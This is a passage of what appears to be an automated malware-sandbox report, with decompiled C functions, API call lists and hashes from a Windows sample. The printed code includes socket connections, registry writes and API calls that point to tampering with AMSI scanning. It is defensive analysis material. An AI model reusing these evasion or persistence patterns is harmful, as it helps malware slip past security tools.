                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x0400a138
                                                                                                                                                                                                                                                                          0x0400a14c
                                                                                                                                                                                                                                                                          0x0400a151
                                                                                                                                                                                                                                                                          0x0400a154
                                                                                                                                                                                                                                                                          0x0400a159
                                                                                                                                                                                                                                                                          0x0400a15a
                                                                                                                                                                                                                                                                          0x0400a15f
                                                                                                                                                                                                                                                                          0x0400a167
                                                                                                                                                                                                                                                                          0x0400a168
                                                                                                                                                                                                                                                                          0x0400a16d
                                                                                                                                                                                                                                                                          0x0400a172
                                                                                                                                                                                                                                                                          0x0400a173
                                                                                                                                                                                                                                                                          0x0400a178
                                                                                                                                                                                                                                                                          0x0400a180
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a186
                                                                                                                                                                                                                                                                          0x0400a13a
                                                                                                                                                                                                                                                                          0x0400a13d
                                                                                                                                                                                                                                                                          0x0400a13e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a143
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                          			E00401110(signed int** _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t10 =  *( *_a4);
                                                                                                                                                                                                                                                                          				if(_t10 > 0xc0000091) {
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000094) {
                                                                                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 8;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 8;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							if(_t23 != 0) {
                                                                                                                                                                                                                                                                          								return E00401DC8(_t10) | 0xffffffff;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 != 0) {
                                                                                                                                                                                                                                                                          							 *_t24 = 8;
                                                                                                                                                                                                                                                                          							 *_t10();
                                                                                                                                                                                                                                                                          							return 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000096) {
                                                                                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 4;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 4;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							return _t10 | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *_t24 = 4;
                                                                                                                                                                                                                                                                          						 *_t10();
                                                                                                                                                                                                                                                                          						return 0xffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 != 0xc0000093) {
                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					_t23 = 1;
                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_t10 < 0xc000008d) {
                                                                                                                                                                                                                                                                          					if(_t10 == 0xc0000005) {
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          						L00402438();
                                                                                                                                                                                                                                                                          						if(_t10 == 1) {
                                                                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                                                                          							 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          							L00402438();
                                                                                                                                                                                                                                                                          							return _t10 | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *_t24 = 0xb;
                                                                                                                                                                                                                                                                          						 *_t10();
                                                                                                                                                                                                                                                                          						return 0xffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t10 != 0xc000001d) {
                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                          0x0040111c
                                                                                                                                                                                                                                                                          0x00401123
                                                                                                                                                                                                                                                                          0x00401165
                                                                                                                                                                                                                                                                          0x004011b4
                                                                                                                                                                                                                                                                          0x00401131
                                                                                                                                                                                                                                                                          0x00401131
                                                                                                                                                                                                                                                                          0x00401139
                                                                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                                                                          0x00401148
                                                                                                                                                                                                                                                                          0x0040123b
                                                                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                                                                          0x0040124a
                                                                                                                                                                                                                                                                          0x00401251
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401262
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401253
                                                                                                                                                                                                                                                                          0x00401150
                                                                                                                                                                                                                                                                          0x004011f0
                                                                                                                                                                                                                                                                          0x004011f7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011f9
                                                                                                                                                                                                                                                                          0x00401156
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401156
                                                                                                                                                                                                                                                                          0x0040116c
                                                                                                                                                                                                                                                                          0x00401186
                                                                                                                                                                                                                                                                          0x00401186
                                                                                                                                                                                                                                                                          0x0040118e
                                                                                                                                                                                                                                                                          0x00401195
                                                                                                                                                                                                                                                                          0x0040119d
                                                                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                                                                          0x0040120b
                                                                                                                                                                                                                                                                          0x00401212
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401217
                                                                                                                                                                                                                                                                          0x004011a1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011a3
                                                                                                                                                                                                                                                                          0x004011aa
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011ac
                                                                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040112c
                                                                                                                                                                                                                                                                          0x0040112a
                                                                                                                                                                                                                                                                          0x0040117d
                                                                                                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                                                                                                          0x004011c4
                                                                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                                                                          0x004011d3
                                                                                                                                                                                                                                                                          0x0040121f
                                                                                                                                                                                                                                                                          0x00401227
                                                                                                                                                                                                                                                                          0x0040122e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401233
                                                                                                                                                                                                                                                                          0x004011d7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011dd
                                                                                                                                                                                                                                                                          0x004011e4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                                                                          0x00401184
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401184
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: signal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                          • Opcode ID: b9bb587fe7c6cb3023dc2312aa5bc470187502754f4a2d40641746054c1a0613
                                                                                                                                                                                                                                                                          • Instruction ID: ea7fa943b60d7b9f1addb821176663a5204698881c51cde0c619178f84824117
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9bb587fe7c6cb3023dc2312aa5bc470187502754f4a2d40641746054c1a0613
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB2101701042018AD7247B69854432F76D06B4A328F554B3FE6EAEB3E1C7BDC884975B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(10004070,00000000,00000800), ref: 10002509
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: AMSI
                                                                                                                                                                                                                                                                          • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                          • Opcode ID: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction ID: 1f1fccf587520e98a24689dc9d6c387d6eb81e8a4efd5f3f63844951b48620cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D111CB4D01209EFEB04CF94CC99BAEBBB4FB48341F208559EA01B7384D7706A40DB59
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009290() {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x04009296
                                                                                                                                                                                                                                                                          0x040092b4
                                                                                                                                                                                                                                                                          0x040092bb
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092d1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                          • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						_v20 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                          						_t26 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_v8 = _t26;
                                                                                                                                                                                                                                                                          						E04007D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                                          						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                                          						_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                                          						if(_t24 == 0) {
                                                                                                                                                                                                                                                                          							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                                          							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x040073ca
                                                                                                                                                                                                                                                                          0x040073e4
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x04007401
                                                                                                                                                                                                                                                                          0x04007404
                                                                                                                                                                                                                                                                          0x04007409
                                                                                                                                                                                                                                                                          0x04007414
                                                                                                                                                                                                                                                                          0x04007429
                                                                                                                                                                                                                                                                          0x04007432
                                                                                                                                                                                                                                                                          0x04007442
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x04007444
                                                                                                                                                                                                                                                                          0x0400744b
                                                                                                                                                                                                                                                                          0x04007465
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x04007473
                                                                                                                                                                                                                                                                          0x0400748b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007495
                                                                                                                                                                                                                                                                          0x0400746d
                                                                                                                                                                                                                                                                          0x040073eb
                                                                                                                                                                                                                                                                          0x0400749e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 04007429
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007473
                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007495
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				signed char _v25;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                                          						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                                          						E04007D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                                          						E04009560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                                          						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                                          						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                                          						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                                          						_a12[_a16] = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04009656
                                                                                                                                                                                                                                                                          0x04009661
                                                                                                                                                                                                                                                                          0x04009685
                                                                                                                                                                                                                                                                          0x04009696
                                                                                                                                                                                                                                                                          0x04009699
                                                                                                                                                                                                                                                                          0x040096b1
                                                                                                                                                                                                                                                                          0x040096bc
                                                                                                                                                                                                                                                                          0x040096cf
                                                                                                                                                                                                                                                                          0x040096d4
                                                                                                                                                                                                                                                                          0x040096df
                                                                                                                                                                                                                                                                          0x040096ef
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x040096f8
                                                                                                                                                                                                                                                                          0x0400970a
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x04009712
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x0400971f
                                                                                                                                                                                                                                                                          0x04009728

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009690
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 040096E9
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009701
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04009719
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                                                                          			E00401E1C(void* __eax, void* __ebx, int __ecx, void* __edx, intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                          				char** _v88;
                                                                                                                                                                                                                                                                          				signed int _v148;
                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                          				long _t57;
                                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                          				signed char* _t70;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                          				intOrPtr* _t87;
                                                                                                                                                                                                                                                                          				intOrPtr* _t89;
